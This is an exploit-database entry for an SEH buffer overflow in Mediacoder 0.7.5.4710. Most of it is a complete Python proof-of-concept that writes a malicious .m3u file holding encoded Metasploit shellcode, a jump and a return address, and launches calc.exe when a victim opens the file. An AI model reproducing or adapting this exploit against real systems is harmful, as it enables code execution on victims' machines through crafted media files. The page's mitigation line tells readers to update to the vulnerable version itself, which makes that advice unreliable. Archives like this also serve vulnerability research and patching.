Mediacoder 0.7.5.4710 'Universal' SEH Buffer Overflow Exploit

vendor:

Mediacoder

by:

Dr_IDE

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Mediacoder

Affected Version From: 0.7.5.4710

Affected Version To: 0.7.5.4710

Patch Exists: Yes

Related CWE: N/A

CPE: a:mediacoder:mediacoder

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XPSP3

2009

Mediacoder 0.7.5.4710 ‘Universal’ SEH Buffer Overflow Exploit

Mediacoder 0.7.5.4710 is vulnerable to a buffer overflow exploit. The vulnerability is triggered when a maliciously crafted .m3u file is loaded and clicked on. This exploit was discovered by abhishek lyall and coded by Dr_IDE. It uses a 534 byte shellcode to execute a calc.exe command.

Mitigation:

Update to the latest version of Mediacoder 0.7.5.4710.

Source

Exploit-DB raw data:

#!/usr/bin/env python

#################################################################
#
# Mediacoder 0.7.5.4710 "Universal" SEH Buffer Overflow Exploit
# Coded By:     Dr_IDE
# Found By:	abhishek lyall
# Usage:        Load the evil .m3u file and click on it.
# Tested On:    Windows XPSP3
#
#################################################################

# windows/exec - 534 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

code = (
"\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b"
"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43"
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b"
"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c"
"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51"
"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51"
"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42"
"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b"
"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45"
"\x31\x42\x4c\x45\x33\x45\x50\x41\x41")

nseh = ("\xEB\x06\xFF\xFF")
retn = ("\xC0\x57\x01\x66")	#"Universal" P/P/R libconv-2.dll
nops = ("\x90" * 12)
buff = ("\x41" * 764)
junk = ("\x44" * (2000-len(buff+nseh+retn+nops+code)))
 
file = open('dr_ide_SEH.m3u' , 'w')
file.write(buff + nseh + retn + nops + code + junk)
file.close()